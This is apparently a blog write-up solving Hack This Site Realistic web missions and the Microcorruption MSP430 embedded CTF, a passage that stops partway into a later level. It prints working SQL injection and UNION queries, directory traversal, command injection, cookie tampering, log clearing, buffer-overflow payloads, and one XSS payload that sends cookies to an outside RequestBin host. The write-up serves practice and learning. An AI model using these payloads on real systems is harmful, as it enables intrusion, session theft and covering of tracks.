Hack This Site Realistic Write-Up

What follows is a write-up of a web security war game, Hack This Site – Realistic.

Players are given a set of requests they must fulfill in order to beat every challenge. Doing so entails using a variety of offensive security tools, crafting up code, and learning throughout the process.

Players must have a good understanding of web vulnerabilities in order to successfully complete the challenges.

[*] Status: COMPLETED
[*] Note:
I am currently updating this blog post to include screenshots.


Uncle Arnold’s Local Band Review




Voting for “Raging Inferno”:
Open Burp Suite’s Proxy with Intercept On
Set the Ranging Inferno’s vote count to 5, and click on “vote!”

screenshot 2

Manipulating the votes to have “Raging Inferno” come out on top:
In the intercepted request, change the vote count to an incredibly high number.

screenshot 3


screenshot 4

Technique used: Parameter manipulation


Chicago American Nazi Party




Checking the source code:
Right-click -> View Page Source

screenshot 2

Notice the hidden “update.php” page.

Browsing to the newly discovered page:

screenshot 3

Bypassing authentication via SQL injection:
Enter username ” ‘ or 1=1– ” and click on “Submit Query”.

screenshot 4


screenshot 5

Technique used: SQL injection


Peace Poetry: HACKED




Checking the source code:
Right-click -> View Page Source

screenshot 2

Notice that we can browse to the original website.

Browsing to the original website “oldindex.html”:

screenshot 3

Copying the source code:
Right-click -> View Page Source -> Ctrl-A -> Ctrl-C

Fixing the website:
Click on “Submit Poetry”
Set the name of the poem to: ../index.html
Paste the original source code in the “Poem” box and click on “add poem”.

screenshot 4


screenshot 5

Technique used: Directory traversal; remote code execution


Fischer’s Animal Products




Testing for SQL injection:

screenshot 2


screenshot 3

Testing for SQL injection via the URL:
Click on “Alligator Accessories”
In the URL bar, add a space, and add the following: UNION ALL SELECT null, *, null, null FROM email;

Full URL: https://www.hackthissite.org/missions/realistic/4/products.php?category=2 UNION ALL SELECT null, *, null, null FROM email;


screenshot 4

What UNION does is join queries, and so the results of additional (malicious) queries are joined with the results of the original query. This allows for the extraction of data within columns of other tables.

Sending the email addresses to the client:
Copy the list of e-mails -> Go to your Hack This Site Profile -> Click on your username

screenshot 5


screenshot 6

Techniques Used: SQL injection using UNION


Damn Telemarketers!




Check the “robots.txt” file:

screenshot 2

Browse to the “secret” directory:

screenshot 3

Click on “admin.bak.php”:

screenshot 4

Cracking the hash:
Browse to: https://crackstation.net/
Enter the hash and submit

screenshot 5

Password: 583bc

Visiting the “Database” page accessible by the main page:
Enter the password: 583bc

screenshot 6


screenshot 7

Techniques Used: Inspecting “robots.txt” file; hash cracking


ToxiCo Industrial Chemicals




Search for “xecryption” via your favorite search engine:

screenshot 2

Proof of concept program: http://telmo.pt/xecryption/

Whether or not intended as the solution, it is important to recognize the value of searching for solutions instead of trying to reinvent the wheel. Of course, that is in terms of efficiency. For fun’s sake, do try indeed.

Results of decrypting the ciphertext via Telmo:

screenshot 3

Sending the decrypted message to ToxiCo_Watch:
Copy the decrypted message
Browse to: https://www.hackthissite.org/pages/messages/msys/send.php
Paste and send the message

screenshot 4


screenshot 5

Techniques Used: Use of Proof of Concept decryption script


What’s Right For America




Checking the source code:
Right-click -> View Page Source

screenshot 2

Notice the directory structure. Browsing to images might reveal other directories.

Checking for other directories:
Browse to: https://www.hackthissite.org/missions/realistic/7/images/

screenshot 3

Bingo. Notice the admin directory.

Checking the admin directory:

screenshot 4

We are going to have to find the password somehow.

Searching for the password:
Back in the main page, click on “Patriotism”.
Notice the URL structure: showimages.php?file=patriot.txt

This may allow for directory traversal. All we have to do is access the correct password path.
We will try grabbing “htpasswd”, the file that Apache uses for authentication.

Grabbing the password:
Modify the URL: showimages.php?file=images/admin/.htpasswd
Right-click -> View Page Source

screenshot 5

screenshot 6

Cracking the password hash:
Copy and paste the password hash into a file, such as “htpasswd”
john htpasswd

screenshot 7

Username: administrator
Password: shadow

Logging into the administrator page:
Browse back to: https://www.hackthissite.org/missions/realistic/7/images/admin/

screenshot 8


screenshot 9

Techniques used: Directory traversal; hash cracking


United Banks Of America




Searching for Gary Hunter’s username:
Click on “User Info”
Enter as user: ‘ or 1=1–

screenshot 2

screenshot 3

Jackpot. We have Gary’s credentials.

Register as a user:
Click on “Register”
Enter random credentials

screenshot 4

screenshot 5

Logging in as our newly created user:

screenshot 6

screenshot 7

Impersonating Gary:
Open Cookies Manager+
Search for “hackthissite” cookies
Edit the “accountUsername” cookie value and set it to: GaryWilliamHunter

screenshot 8

Transferring the money:
Set the user to send the money to as “dropCash” and the amount to: 10000000
Click on “Move Money To A Different Account”

screenshot 9

screenshot 10

Clearing the logs:
Log in again
Open Burp Suite’s Proxy with Intercept On
Click on “Clear Files In Personal Folder”
Change the “dir” parameter value to: logFiles

screenshot 11


screenshot 12

Techniques used: SQL injection; session hijacking; parameter manipulation; local file inclusion


CrappySoft Software




Log in with the supplied credentials:

screenshot 2

Create a private RequestBin:
Browse to http://requestb.in and create a private RequestBin

screenshot 3

Perform Cross-Site Scripting (XSS) via private messages:
Click on “[Private Message]”
Send a XSS payload to the boss, m-crap (owner)

<iframe frameborder=0 height=0 width=0 src=javascript:void(window.location=”http://requestb.in/1mep2ns1?c=&#8221; + document.cookie)</iframe>

screenshot 4


screenshot 5

The challenge assumed we wouldn’t be able to get the cookie back. However, the method shown above is valid.

Set the cookies to the admin values:
Open Cookies Manager+

screenshot 6

screenshot 7

screenshot 8

Transferring the money:
Click on “[Pay Salaries]”
Pay r-conner

screenshot 9

screenshot 10

Cleaning the logs:
Click on “[Mailing List]”
Right-click -> Inspect Element -> Change the ‘strFileName’ value to: ./files/logs/logs.txt
Click on “Subscribe!”

screenshot 11


screenshot 12

Techniques used: Cross-Site Scripting (XSS); local file inclusion


Holy Word High School




Checking the source code:
Right-click -> View Page Source

screenshot 2

Notice the hidden “staff.php” page.

Logging in as Zach:
Click on “Student Access System”
Log in with the supplied credentials.

screenshot 3

Gaining teacher credentials:
Click on “Staff Listing”
Go back to the “staff.php” page
Log in as smiller:smiller

screenshot 5

screenshot 4

screenshot 6

We are going to have to bypass the crappy protection.

Bypassing the limitations:
Open User Agent Switcher -> Edit User Agents -> New -> New User Agent -> Add “holy_teacher” -> Ok
Open Cookies Manager+ -> Search for ‘admin’ -> Change Content to: 1
Refresh the page

screenshot 7

screenshot 8

screenshot 9

Changing Zach’s grades:
Click on “Change Grades”
Click on “Zach Sanchez”
Right-click -> View Page Source Code
Browse to: https://www.hackthissite.org/missions/realistic/10/staff.php?action=changegrades&changeaction=modrec&rec=4&studentid=1&grade=5
Browse to: https://www.hackthissite.org/missions/realistic/10/staff.php?action=changegrades&changeaction=modrec&rec=0&studentid=1&grade=5
Browse to: https://www.hackthissite.org/missions/realistic/10/staff.php?action=changegrades&changeaction=modrec&rec=3&studentid=1&grade=5

screenshot 10

screenshot 11

The modifications were possible due to the URL parameter inclusion and the HTTP POST method being utilized.


screenshot 12

Techniques used: User-Agent manipulation; Parameter manipulation; HTTP POST request abuse


BudgetServ Web Hosting




Inspecting the website functionality:
Click on “WebMail”
Notice the URL structure: https://www.hackthissite.org/missions/realistic/11/page.pl?page=email

Testing for directory traversal or command injection:
In the URL: https://www.hackthissite.org/missions/realistic/11/page.pl?page=stuff

screenshot 2

We may be able to get a listing of all directories.

Listing all directories:
In the URL: https://www.hackthissite.org/missions/realistic/11/page.pl?page=|ls|

screenshot 3

Browsing to the “client_http_docs” directory:

screenshot 4

Browsing to “therightwayradio” and inspecting the source code:

screenshot 5

Manipulating user information:
Browse to: https://www.hackthissite.org/missions/realistic/11/client_http_docs/therightwayradio/?page=userinfo
Notice there’s a user whose information we can change
Change the password to: coconuts
Click on “edit account”

screenshot 6

screenshot 7

Log in as “aclu_bomber_08290”:

screenshot 8

screenshot 9

Changing SQL databases:
Click on “mod”
Right-click on the input field and select “Inspect Element”
Change the “sql_db” value from “rwr.dbase” to: ../../../bs.dbase

screenshot 10

Extract database information:
SELECT * FROM sqlite_master -> sql query

screenshot 11

Extract admin credentials:
SELECT * FROM web_hosting -> sql query

screenshot 12

Navigate to the admin page in WebServ and enter the credentials:
URL: https://www.hackthissite.org/missions/realistic/11/admin/

screenshot 13

screenshot 14

Checking the source code:
Right-click -> View Page Source

screenshot 15

Downloading the desired file:
URL: https://www.hackthissite.org/missions/realistic/11/admin/d.pl?file=/var/www/budgetserv/html/client_http_docs/space46/src.tar.gz


screenshot 16

Techniques used: Command injection; directory traversal


Heartland School District




Learning more about Windows 95:
Search for: windows 95 server path

screenshot 2

This result leads us to believe we can specify whether we’re accessing a web page (via the http prefix) or a local file.

Mapping the drive:
In the address bar: file:\\C:\\

screenshot 3

screenshot 4

Success. We can access local files via the address box.

Accessing web resources:
In the address bar: file:\\C:\\WEB\

screenshot 7

Investigating HTML files:
In the address bar: file:\\C:\\WEB\HTML

screenshot 5

screenshot 6

Notice the admin panel. Let us visit it and try to break in.

Exploring the admin panel:

screenshot 8

We are going to have to find the password somehow.

Finding a way to get the admin password:
Back in the main page, click on “Student Work”
Click on “Joey Simons”

screenshot 9

Notice there’s some additional functionality in this page, via “Sign my guestook”.

Discovering another way to access files:
Click on “Sign my guestook”.
Right-click on the input box -> Inspect Element

screenshot 10

Notice the new “guest.pl” file which has “write” permissions. If it has Write permissions, it very likely also has Read permissions. This may be a way to grab the admin’s password.

Grabbing the admin’s password:
Browse to: https://www.hackthissite.org/missions/realistic/12/cgi-bin/guest.pl?action=read&file=heartlandadminpanel.pl
Right-click -> View Page Source

screenshot 11


Username: jbardus
Password: heartlandnetworkadministrator

Logging in as JBardus:

screenshot 12

screenshot 13

Completing the mission:
Click on “clear all”


screenshot 14

Techniques used: Directory traversal; local file inclusion


Elbonian Republican Party




Understanding the website:
Click on “Press Releases”
Right-click -> View Page Source
Click on “readpress.php”

screenshot 2

screenshot 3

From the “readpress.php” we discover many facts:
1) The machine runs MySQL
2) The service is Apache
3) The machine runs Windows
4) We can access hidden data by obtaining the hex digest of the string “Speeches”

Obtaining the hex digest of “Speeches”:
python -c ‘import hashlib; print hashlib.md5(“Speeches”).hexdigest()’

screenshot 4

Hex digest: 7e40c181f9221f9c613adf8bb8136ea8

Accessing restricted data:
Browse to: https://www.hackthissite.org/missions/realistic/13/speeches/passwords/7e40c181f9221f9c613adf8bb8136ea8/

screenshot 5

Obtaining the password:
Click on “passwords.fip”
Browse to: https://crackstation.net/
Enter the hashes, one per line

screenshot 6

User: moni1
Pass: admin

Accessing the admin panel:
Browse to: https://www.hackthissite.org/missions/realistic/13/admin/
Enter the credentials found earlier

screenshot 7

screenshot 8

Strange. However, remember how the paths were hashed. Let’s try accessing the admin page again, but with a hash instead.

Browse to: https://www.hackthissite.org/missions/realistic/13/21232f297a57a5a743894a0e4a801fc3/
Enter the cracked credentials

screenshot 9


screenshot 10

Techniques used: Source code review; directory traversal; hash/password cracking


Yuppers Internet Solutions




Checking the source code:
Click on “News”
Right-click -> View Page Source

screenshot 2

Notice the URL structure. We may be able to manipulate the database via the URL.

Testing for SQL injection:
In the URL: https://www.hackthissite.org/missions/realistic/14/news.cgi?news=&#8217;

screenshot 3

Notice that the search works by using our query and appending “.news” to it.
We can try bypassing this concatenation by using null bytes (%00).

Further testing the SQL injection theory:
In the URL: https://www.hackthissite.org/missions/realistic/14/news.cgi?story=.%00

screenshot 4

Success. The website is vulnerable to SQL injections.
Notice the “moderator.cgi” file, which seems particularly interesting.

Checking the “moderator.cgi” file:
In the URL: https://www.hackthissite.org/missions/realistic/14/news.cgi?story=moderator.cgi%00

screenshot 6

If we have the program believe that we are admin by providing the “isadmin” parameter, we can bypass security measures.

Browsing to the “moderator.cgi” file and providing “isadmin”:

screenshot 5

screenshot 7

Great success.

Getting a list of users:
View Account Info: *

screenshot 8

screenshot 9

We now have the admin credentials, webguy:reallyreallylongpasswordthatisveryveryveryhardtoguessorcrack
We can now attempt to log in as an admin.

Logging in as admin:
Browse to: https://www.hackthissite.org/missions/realistic/14/login
Enter the credentials found earlier

screenshot 10

screenshot 11

Completing the mission:
Click on “Administrator Panel”

screenshot 12

Techniques used: SQL injection using null bytes


seculas Ltd.




Checking the source code:
Click on “News”
Right-click -> View Page Source

screenshot 2

Notice the admin information. This could be useful later.

Checking for vulnerabilities within the pages:
Click on “Jobs”
Click on “Send your application”
Click on “Send”
Right-click -> View Page Source

screenshot 3

Notice there’s a backup directory.

Browsing to the backups directory:
URL: https://www.hackthissite.org/missions/realistic/15/_backups_/

screenshot 4

Checking the “backup.zip” file:
Download the file
Open it

screenshot 5screenshot 6screenshot 7

Notice the files are password-protected.

Since the password cannot be found online, we can use PkCrack to crack the files.
PkCrack can help us break open the file via a “known plaintext attack”, which basically means we need to know part of the encrypted data in order to break the cipher.

Luckily for us, the ZIP file contains “index.htm”, which we have access to.

Using PkCrack and the “index.htm” file to break open the passowrd-protected ZIP file:
Browse to: https://www.hackthissite.org/missions/realistic/15/index.htm
Right-click -> Save Page As -> index.htm -> Web Page, HTML only
Compress the ‘index.htm’ using Winace
pkcrack -c “misc (files from different folders)/index.htm” -p index.htm -C backup.zip -P index.zip -d decracked.zip -*
Open the “decracked.zip” file -> Internal messages -> msgauth.php

screenshot 8screenshot 9

Take note of the variable names. These might be useful when bypassing authentication.

misc (files from different folders) -> shell.php

screenshot 10screenshot 11

Notice the variable names and the (unlimited) directory limit.

Creating an HTML file to log in as Susy:

screenshot 12

Logging in as Susy:
Double-click on the HTML file we just created.
Click on “send”

screenshot 13

screenshot 14

Browse to: https://www.hackthissite.org/missions/realistic/15/internal_messages/internal_messages.php
Enter Susy’s credentials and click on “read messages”

screenshot 15screenshot 16

Following the admin_area lead:
Browse to: https://www.hackthissite.org/missions/realistic/15/admin_area/

screenshot 17

Browse to: http://www.hackthissite.org/missions/realistic/15/admin_area/shell.php

screenshot 18

Click Ok

screenshot 19

Click “Cancel”

screenshot 20

Notice the hash.
Let’s try to crack it using CrackStation.

Cracking the hash:

screenshot 21

Password: foobar

Accessing the shell page:
Browse back to: http://www.hackthissite.org/missions/realistic/15/admin_area/shell.php
User Name: root
Password: foobar

screenshot 22

screenshot 23

Using the shell to list directory contents:

screenshot 24

Voila. Notice the “viewpatents” files. These are what we want.

Following on the patent lead:
Browse to: https://www.hackthissite.org/missions/realistic/15/admin_area/viewpatents.php

screenshot 25

We get another login form. Time to look for the credentials.

Looking for the credentials to unlock patents:
Browse to: https://www.hackthissite.org/missions/realistic/15/admin_area/test/

screenshot 26

Excellent. Looks like we found the credentials.

Checking the “chkuserpass.c.zip” file:
Download the file and unzip it
Open the chkuserpass.c file

screenshot 27screenshot 28

Looks like we are going to perform a good ol’ buffer overflow to bypass authentication.
Notice that all we need to have in order to bypass authentication is “is_pass_correct” set to ‘Y’.

Performing a buffer overflow on the username field:
python -c ‘print “Y” * 230’
Copy the output and paste it in the username field
Click on “OK”

screenshot 29


screenshot 30

Techniques used: Known plaintext attack; hash cracking; buffer overflow


Simple Mail




Checking the source code:
Click on “News”
Right-click -> View Page Source

screenshot 2

Notice the URL structure, and also the admin login page.

Accessing the admin login page:
Browse to: https://www.hackthissite.org/missions/realistic/16/index.php?module=admin_login

screenshot 3

Open Burp Suite’s Proxy with Intercept On
Click on “Login”

screenshot 4screenshot 5

Notice the requests to these two files. These might be useful in the future.
For now, we will register a new user to see what else we can do.

Register as a new user:
Browse over “Members” -> Click on “Register”

screenshot 6

Inspect member functionality:
Log in as the newly created user
Click on “User Panel” -> “Edit My Profile”
Right-click -> View Page Source
Click on “edit.php”

screenshot 7screenshot 8

Notice how the configurations are saved.
We are in control of the username parameter, which means we may be able to perform directory traversal by choosing a special username.

Creating a malicious user:
Click on “Members” -> “Logout”
Click on “Members” -> “Register”

screenshot 9

Carrying out the attack:
Log in as the newly created user
Click on “User Panel” -> “Edit My Profile”
Personal Message: auth_page=config.txt&authed=true&

screenshot 10


Confirming attack was successful:
Browse to: https://www.hackthissite.org/missions/realistic/16/config.txt

screenshot 11screenshot 12

Log in via the admin panel:
Browse to: https://www.hackthissite.org/missions/realistic/16/index.php?module=admin_login

screenshot 13screenshot 14

Reviewing Jenn’s email:

screenshot 15

screenshot 16

Right-clicking on the input field shows that this is a Flash application.
This means we could download it and reverse engineer it.

Downloading the Flash file:
Right-click -> View Page Source

screenshot 17

Analyzing the Flash file:
flasm -d check_email.swf

screenshot 18

We simply have to navigate to that path and add Jenn’s email at the end.

Checking Jenn’s emails:
Browse to: https://www.hackthissite.org/missions/realistic/16/check_email.php?auth=true&id=63a4bf12cd&email=jenn@simplemail.com

screenshot 19

Techniques used: Local file inclusion; directory traversal; client-side control bypass via Flash reverse engineering

Microcorruption Write-Up

What follows is a write-up of an embedded security capture the flag (CTF), Microcorruption.

The CTF has security researchers try their hands against a TI MSP430 microcontroller.


Players are given a debugger and a device, and they have to find the input that unlocks the device. Every level gets progressively harder and include techniques such as address space layout randomization (ASLR), data execution prevention (DEP), and alphanumeric limitations.


[*] Status: COMPLETED

Level 1: New Orleans


– This is the first LockIT Pro Lock.
– This lock is not attached to any hardware security module.


The LockIT Pro a.01  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There is  no default password  on the LockIT  Pro—upon receiving
the LockIT Pro, a new password must be set by connecting it to the
LockIT Pro  App and  entering a password  when prompted,  and then
restarting the LockIT Pro using the red button on the back.

This is Hardware  Version A.  It contains  the Bluetooth connector
built in, and one available port  to which the LockIT Pro Deadbolt
should be connected.


Break main and type “continue”.


screenshot 2

Investigate the create_password function.

screenshot 3

Notice “create_password” creates the correct password at address 0x2400.

Type ‘c’ (continue) and then press “Wait”.

screenshot 4

Notice in the live memory dump that the correct password is in address 0x2400.

Password: fVk*s!!

Type “solve” and enter the password.

screenshot 5

Level 2: Sydney


– We have revised the software in revision 02.
– This lock is not attached to any hardware security module.


The LockIT Pro a.02  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There is  no default password  on the LockIT  Pro—upon receiving
the LockIT Pro, a new password must be set by connecting it to the
LockIT Pro  App and  entering a password  when prompted,  and then
restarting the LockIT Pro using the red button on the back.

This is Hardware  Version A.  It contains  the Bluetooth connector
built in, and one available port  to which the LockIT Pro Deadbolt
should be connected.

This is  Software Revision 02.  We have received reports  that the
prior  version of  the  lock was  bypassable  without knowing  the
password. We have fixed this and removed the password from memory.

Break main and type “c”.


Investigate the check_password function.

screenshot 2

Notice “check_password” reads our input sequentially and compares it.

Taking into account that the machine deals in 16-bit little endian, the comparisons translate to:
0x3c72     = r<
0x515b     = [Q
0x582d     = -X
0x4f69     = iO

Password: r<[Q-XiO

Type “reset”, “solve”, and enter the password.

screenshot 3

Level 3: Hanoi


– This lock is attached the the LockIT Pro HSM-1.
– We have updated  the lock firmware  to connect with the hardware
security module.


The LockIT Pro b.01  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-1.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 1 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-1  a password, and the
HSM will  return if the password  is correct by setting  a flag in

This is Hardware  Version B.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-1 should  be
connected to port 2.

Break main and type “c”.


Investigate the “login” function.

screenshot 2

Notice at address 0x455a that there is a comparison instruction: cmp.b    #0x40, &0x2410

0x40 = @

Type ‘c’, input: aaaabbbb, and send.

screenshot 3

Notice in the live memory dump that our input starts at address 0x2400.

We can now calculate the offset to bypass the password authentication:
2410 – 2400 = 16

Testing our calculations:
python -c “print ‘a’ * 16 + ‘@'”
Input: aaaaaaaaaaaaaaaa@

screenshot 4

String that allows bypass: aaaaaaaaaaaaaaaa@

Type “solve”, input the “password” and send.

screenshot 5

Level 4: Reykjavik


– Lockitall developers  have implemented  military-grade on-device
encryption to keep the password secure.
– This lock is not attached to any hardware security module.


The LockIT Pro a.03  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There is  no default password  on the LockIT  Pro—upon receiving
the LockIT Pro, a new password must be set by connecting it to the
LockIT Pro  App and  entering a password  when prompted,  and then
restarting the LockIT Pro using the red button on the back.

This is Hardware  Version A.  It contains  the Bluetooth connector
built in, and one available port  to which the LockIT Pro Deadbolt
should be connected.

This is Software Revision 02. This release contains military-grade
encryption so users can be confident that the passwords they enter
can not be read from memory.   We apologize for making it too easy
for the password to be recovered on prior versions.  The engineers
responsible have been sacked.

Break main and type “c”.


Note the call to 0x2400

Break 2400 and type “c”.

Type “read 2400 180”.

screenshot 2

Copy the output and paste it into a file “reykjavik.txt”.

Run “get_instructions.py”:
python get_instructions.py

screenshot 3

Copy the output, open the Assembler in a new tab, paste the output and click on “Disassemble”.

screenshot 4

Note the following instruction:
cmp    #0x869d, -0x24(r4)

Type “c” and input “aaaa”.

Notice the register state:

screenshot 5

As per the instruction: cmp    #0x869d, -0x24(r4)
-0x24(r4) = 0x43fe – 0x24 = 0x43da

Looking at the live memory dump, we can see that 0x43da is the start of our input.
This means the instruction is comparing our input to 0x869d

Password (hex-encoded input): 9d86

Type “reset”, “solve”, and enter the password.

screenshot 6

Level 5: Cusco


– We have fixed issues with passwords which may be too long.
– This lock is attached the the LockIT Pro HSM-1.


The LockIT Pro b.02  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-1.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 1 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-1  a password, and the
HSM will  return if the password  is correct by setting  a flag in

This is Hardware  Version B.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-1 should  be
connected to port 2.

This is Software Revision 02. We have improved the security of the
lock by  removing a conditional  flag that could  accidentally get
set by passwords that were too long.

Break main and type “c”.

screenshotscreenshot 2

We will break at login’s ret address.

Break 453e and type “c”.
python -c “print ’41’ * 20”

Input (hex-encoded): 4141414141414141414141414141414141414141

Type “read sp 8”.

screenshot 2

screenshot 3

Notice that our input starts at 0x43ee and the stack pointer is at 0x43fe
python -c “print 0x43fe – 0x43ee”

The result is 16.

We will aim to perform a buffer overflow.

screenshot 4

unlock_door starts at 4446.
With the information we have we can now bypass authentication by perform a buffer overflow.

Performing the buffer overflow:
python -c “print ’41’ * 16 + ‘4644’”

Password (hex encoded input): 414141414141414141414141414141414644

Type “reset”, “solve”, and enter the password.

screenshot 5

Level 6: Whitehorse


– This lock is attached the the LockIT Pro HSM-2.
– We have updated  the lock firmware to connect with this hardware
security module.


The LockIT Pro c.01  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-2.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 2 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-2  a password, and the
HSM will  directly send the  correct unlock message to  the LockIT
Pro Deadbolt  if the password  is correct, otherwise no  action is

This is Hardware  Version C.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-2 should  be
connected to port 2.

This is  Software Revision  01. The firmware  has been  updated to
connect with the new hardware security module. We have removed the
function to unlock the door from the LockIT Pro firmware.

Break main and type “c”.


Break 4514 and type “c”.

screenshot 2

Break 452e and type “c”.
python -c “print ’41’ * 20”

Input (hex-encoded): 4141414141414141414141414141414141414141

Type “read sp 8”.

screenshot 3screenshot 4

Notice our input starts at 0x3600 and the stack pointer is at 0x3610
This means the offset is 16

We will aim to perform a buffer overflow by using the interrupt called by conditional_unlock_door.

screenshot 5

Looking at the manual, we can see that INT 0x7f is just what we need.

screenshot 6

This interrupt is at 4460.

Performing the buffer overflow:
python -c “print ’41’ * 16 + ‘60447f'”

Password (hex encoded input): 4141414141414141414141414141414160447f

Type “reset”, “solve”, and enter the password.

screenshot 7

Level 7: Montevideo


– Lockitall developers  have rewritten the code  to conform to the
internal secure development process.
– This lock is attached the the LockIT Pro HSM-2.


The LockIT Pro c.03  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-2.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 2 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-2  a password, and the
HSM will  directly send the  correct unlock message to  the LockIT
Pro Deadbolt  if the password  is correct, otherwise no  action is

This is Hardware  Version C.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-2 should  be
connected to port 2.

This is Software Revision 03. We have received unconfirmed reports
of issues with the previous series of locks. We have reimplemented
much  of the  code according  to our  internal Secure  Development

Break main and type “c”.


Notice that Montevideo looks very similar to Whitehorse.
We will try the same solution.

Trying the Whitehorse solution:

Input (hex-encoded): 4141414141414141414141414141414160447f

screenshot 2

The same solutions works!

Type “reset”, “solve”, and enter the password.

screenshot 3


Level 8: Johannesburg


– A firmware update rejects passwords which are too long.
– This lock is attached the the LockIT Pro HSM-1.


The LockIT Pro b.04  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-1.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 1 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-1  a password, and the
HSM will  return if the password  is correct by setting  a flag in

This is Hardware  Version B.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-1 should  be
connected to port 2.

This is Software Revision 04. We have improved the security of the
lock by ensuring passwords that are too long will be rejected.

Break main and type “c”.


screenshot 2

Notice 0x4578 in login has cmp.b    #0x18, 0x11(sp)

Break 4590 and type “c” twice.
python -c “print ’41’ * 16”

Input (hex-encoded): 41414141414141414141414141414141

screenshot 3

Notice that there is an 18, 18 bytes after our input.
This 18 acts as a stack canary.
Stack canaries are basically integers that are placed just before the stack pointer. Similar to canaries in a coal mine, if the integer gets overwritten, the program knows that there was a buffer overflow attempt.

screenshot 4

Notice that unlock_door starts at address 4446.

Performing the buffer overflow:
python -c “print ’41’ * 17 + ’18’ + ‘4644’”

Password (hex encoded input): 4141414141414141414141414141414141184644

Type “reset”, “solve”, and enter the password.

screenshot 5

Level 9: Addis Adaba


– We have verified passwords can not be too long.
– Usernames are printed back to the user for verification.
– This lock is attached the the LockIT Pro HSM-1.


The LockIT Pro b.03  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
